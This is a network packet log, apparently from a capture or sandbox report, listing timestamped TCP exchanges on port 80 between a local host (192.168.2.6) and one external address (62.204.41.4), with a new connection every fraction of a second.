Feb 7, 2023 20:03:07.020131111 CET	50197	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:07.021018028 CET	50198	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:07.081657887 CET	80	50197	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:07.081964016 CET	50197	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:07.082395077 CET	80	50198	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:07.082526922 CET	50198	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:07.083062887 CET	50198	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:07.144520998 CET	80	50198	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:07.148803949 CET	80	50198	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:07.149034977 CET	50198	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:07.263169050 CET	50198	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:07.264028072 CET	50199	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:07.324747086 CET	80	50199	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:07.324879885 CET	80	50198	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:07.325002909 CET	50199	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:07.325136900 CET	50198	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:07.326755047 CET	50199	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:07.387131929 CET	80	50199	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:07.389992952 CET	80	50199	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:07.390078068 CET	50199	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:07.497400045 CET	50199	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:07.498279095 CET	50200	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:07.558068037 CET	80	50199	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:07.558281898 CET	50199	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:07.559474945 CET	80	50200	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:07.559609890 CET	50200	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:07.560015917 CET	50200	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:07.621819019 CET	80	50200	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:07.623392105 CET	80	50200	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:07.623534918 CET	50200	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:07.730825901 CET	50200	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:07.732801914 CET	50201	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:07.792407990 CET	80	50200	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:07.792529106 CET	50200	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:07.795028925 CET	80	50201	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:07.795206070 CET	50201	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:07.797560930 CET	50201	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:07.860290051 CET	80	50201	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:07.863240004 CET	80	50201	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:07.863529921 CET	50201	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:07.965343952 CET	50201	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:07.966104984 CET	50202	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:08.028105974 CET	80	50201	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:08.028237104 CET	50201	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:08.028918028 CET	80	50202	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:08.029040098 CET	50202	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:08.029584885 CET	50202	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:08.092293024 CET	80	50202	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:08.095988035 CET	80	50202	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:08.096246004 CET	50202	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:08.201389074 CET	50202	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:08.202511072 CET	50203	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:08.264127016 CET	80	50203	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:08.264199018 CET	80	50202	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:08.264318943 CET	50203	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:08.264381886 CET	50202	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:08.264781952 CET	50203	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:08.326153040 CET	80	50203	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:08.329248905 CET	80	50203	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:08.329313993 CET	50203	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:08.435224056 CET	50203	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:08.436430931 CET	50204	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:08.497936010 CET	80	50203	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:08.497991085 CET	80	50204	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:08.498050928 CET	50203	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:08.498255968 CET	50204	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:08.498528957 CET	50204	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:08.560992002 CET	80	50204	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:08.562843084 CET	80	50204	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:08.563095093 CET	50204	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:08.673842907 CET	50204	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:08.674737930 CET	50205	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:08.735717058 CET	80	50204	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:08.735805035 CET	50204	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:08.738023996 CET	80	50205	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:08.738114119 CET	50205	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:08.738599062 CET	50205	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:08.802434921 CET	80	50205	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:08.804395914 CET	80	50205	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:08.804487944 CET	50205	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:08.920034885 CET	50205	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:08.920723915 CET	50206	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:08.982444048 CET	80	50206	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:08.982578039 CET	50206	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:08.982630014 CET	80	50205	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:08.982744932 CET	50205	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:08.986815929 CET	50206	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:09.049566984 CET	80	50206	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:09.053705931 CET	80	50206	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:09.053843021 CET	50206	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:09.169995070 CET	50206	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:09.171195030 CET	50207	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:09.231816053 CET	80	50206	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:09.231933117 CET	50206	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:09.234045029 CET	80	50207	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:09.237651110 CET	50207	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:09.251394033 CET	50207	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:09.314907074 CET	80	50207	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:09.317115068 CET	80	50207	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:09.317215919 CET	50207	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:09.435906887 CET	50207	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:09.437633991 CET	50208	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:09.498903036 CET	80	50207	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:09.499475956 CET	50207	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:09.500135899 CET	80	50208	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:09.500344038 CET	50208	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:09.500906944 CET	50208	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:09.563714027 CET	80	50208	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:09.565390110 CET	80	50208	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:09.565556049 CET	50208	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:09.670497894 CET	50208	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:09.672249079 CET	50209	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:09.733408928 CET	80	50208	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:09.735428095 CET	80	50209	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:09.735517025 CET	50208	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:09.735636950 CET	50209	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:09.736542940 CET	50209	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:09.799094915 CET	80	50209	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:09.801541090 CET	80	50209	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:09.801795006 CET	50209	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:09.919078112 CET	50209	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:09.919615984 CET	50210	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:09.982147932 CET	80	50209	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:09.982180119 CET	80	50210	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:09.982379913 CET	50209	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:09.982449055 CET	50210	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:09.990258932 CET	50210	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:10.053524971 CET	80	50210	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:10.056719065 CET	80	50210	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:10.056968927 CET	50210	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:10.171616077 CET	50210	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:10.173333883 CET	50211	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:10.235048056 CET	80	50210	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:10.235265970 CET	50210	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:10.236042976 CET	80	50211	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:10.236191988 CET	50211	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:10.237660885 CET	50211	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:10.299876928 CET	80	50211	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:10.302833080 CET	80	50211	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:10.302963018 CET	50211	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:10.419440031 CET	50211	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:10.420219898 CET	50212	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:10.481791973 CET	80	50211	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:10.481887102 CET	50211	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:10.482362032 CET	80	50212	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:10.482575893 CET	50212	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:10.483510971 CET	50212	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:10.545780897 CET	80	50212	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:10.548284054 CET	80	50212	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:10.548480988 CET	50212	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:10.669056892 CET	50212	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:10.669755936 CET	50213	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:10.731973886 CET	80	50213	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:10.731985092 CET	80	50212	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:10.732338905 CET	50212	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:10.732368946 CET	50213	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:10.733288050 CET	50213	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:10.795515060 CET	80	50213	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:10.797100067 CET	80	50213	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:10.797250032 CET	50213	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:10.909316063 CET	50213	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:10.909995079 CET	50214	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:10.970985889 CET	80	50213	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:10.971210003 CET	80	50214	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:10.971240997 CET	50213	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:10.971380949 CET	50214	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:10.972258091 CET	50214	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:11.033596039 CET	80	50214	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:11.035756111 CET	80	50214	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:11.035855055 CET	50214	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:11.137667894 CET	50214	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:11.138988972 CET	50215	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:11.199687958 CET	80	50214	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:11.199728012 CET	80	50215	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:11.199830055 CET	50214	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:11.199872017 CET	50215	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:11.200841904 CET	50215	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:11.261485100 CET	80	50215	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:11.265623093 CET	80	50215	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:11.265846014 CET	50215	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:11.376221895 CET	50215	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:11.377238035 CET	50216	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:11.437088966 CET	80	50215	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:11.437288046 CET	50215	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:11.438826084 CET	80	50216	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:11.438970089 CET	50216	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:11.470014095 CET	50216	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:11.531816006 CET	80	50216	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:11.534045935 CET	80	50216	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:11.534164906 CET	50216	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:11.640346050 CET	50216	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:11.641102076 CET	50217	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:11.701914072 CET	80	50216	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:11.702008009 CET	50216	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:11.702508926 CET	80	50217	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:11.702647924 CET	50217	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:11.704054117 CET	50217	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:11.766140938 CET	80	50217	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:11.768791914 CET	80	50217	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:11.768888950 CET	50217	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:11.873284101 CET	50217	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:11.874033928 CET	50218	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:11.935023069 CET	80	50217	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:11.935152054 CET	50217	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:11.935468912 CET	80	50218	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:11.935587883 CET	50218	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:11.936212063 CET	50218	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:11.997595072 CET	80	50218	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:11.999941111 CET	80	50218	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:12.000061989 CET	50218	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:12.111618996 CET	50218	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:12.116053104 CET	50219	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:12.173388958 CET	80	50218	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:12.173613071 CET	50218	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:12.178590059 CET	80	50219	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:12.178702116 CET	50219	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:12.179096937 CET	50219	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:12.241607904 CET	80	50219	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:12.246732950 CET	80	50219	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:12.250766993 CET	50219	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:12.379503965 CET	50219	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:12.380183935 CET	50220	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:12.441778898 CET	80	50220	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:12.442117929 CET	50220	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:12.442316055 CET	80	50219	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:12.442395926 CET	50219	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:12.442627907 CET	50220	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:12.504134893 CET	80	50220	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:12.506438971 CET	80	50220	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:12.510112047 CET	50220	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:12.627041101 CET	50220	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:12.628104925 CET	50221	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:12.687350988 CET	80	50221	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:12.687876940 CET	50221	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:12.688306093 CET	50221	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:12.688508034 CET	80	50220	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:12.688611984 CET	50220	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:12.747531891 CET	80	50221	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:12.750021935 CET	80	50221	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:12.750199080 CET	50221	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:12.871860027 CET	50221	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:12.872672081 CET	50222	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:12.931920052 CET	80	50221	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:12.932714939 CET	80	50222	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:12.932863951 CET	50221	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:12.932985067 CET	50222	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:12.933465004 CET	50222	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:12.993325949 CET	80	50222	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:12.994988918 CET	80	50222	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:12.995146036 CET	50222	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:13.106724024 CET	50222	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:13.107542038 CET	50223	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:13.166085958 CET	80	50222	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:13.166307926 CET	50222	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:13.167072058 CET	80	50223	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:13.167221069 CET	50223	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:13.167789936 CET	50223	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:13.227356911 CET	80	50223	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:13.231307030 CET	80	50223	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:13.231405973 CET	50223	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:13.343261003 CET	50223	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:13.344511986 CET	50224	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:13.402786016 CET	80	50223	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:13.402988911 CET	50223	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:13.407219887 CET	80	50224	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:13.407433033 CET	50224	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:13.408042908 CET	50224	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:13.470654011 CET	80	50224	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:13.472860098 CET	80	50224	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:13.473062992 CET	50224	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:13.575633049 CET	50224	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:13.579648972 CET	50225	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:13.638557911 CET	80	50224	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:13.638644934 CET	50224	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:13.640187025 CET	80	50225	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:13.640314102 CET	50225	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:13.640810013 CET	50225	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:13.701328039 CET	80	50225	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:13.704272985 CET	80	50225	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:13.704473019 CET	50225	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:13.810795069 CET	50225	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:13.811945915 CET	50226	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:13.871407986 CET	80	50225	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:13.871675014 CET	50225	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:13.873377085 CET	80	50226	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:13.873613119 CET	50226	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:13.874521971 CET	50226	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:13.935967922 CET	80	50226	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:13.938580036 CET	80	50226	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:13.938724041 CET	50226	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:14.044851065 CET	50226	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:14.045996904 CET	50227	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:14.105550051 CET	80	50227	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:14.105835915 CET	50227	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:14.106486082 CET	80	50226	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:14.106585979 CET	50226	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:14.108352900 CET	50227	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:14.167612076 CET	80	50227	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:14.171869040 CET	80	50227	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:14.172010899 CET	50227	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:14.285525084 CET	50227	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:14.286189079 CET	50228	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:14.345120907 CET	80	50227	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:14.345304012 CET	50227	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:14.349214077 CET	80	50228	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:14.349379063 CET	50228	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:14.349981070 CET	50228	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:14.412589073 CET	80	50228	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:14.415443897 CET	80	50228	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:14.415591002 CET	50228	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:14.528901100 CET	50228	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:14.532545090 CET	50229	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:14.592029095 CET	80	50228	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:14.592255116 CET	50228	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:14.592786074 CET	80	50229	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:14.593039989 CET	50229	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:14.593388081 CET	50229	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:14.652695894 CET	80	50229	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:14.655284882 CET	80	50229	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:14.655447006 CET	50229	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:14.813479900 CET	50229	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:14.814359903 CET	50230	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:14.872910976 CET	80	50229	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:14.873028994 CET	50229	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:14.874886990 CET	80	50230	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:14.875001907 CET	50230	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:14.875718117 CET	50230	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:14.936594009 CET	80	50230	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:14.938288927 CET	80	50230	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:14.938427925 CET	50230	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:15.045835018 CET	50230	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:15.046463966 CET	50231	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:15.106349945 CET	80	50230	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:15.106446028 CET	50230	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:15.107003927 CET	80	50231	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:15.107137918 CET	50231	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:15.107613087 CET	50231	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:15.168071032 CET	80	50231	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:15.171725035 CET	80	50231	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:15.171858072 CET	50231	80	192.168.2.6	62.204.41.4
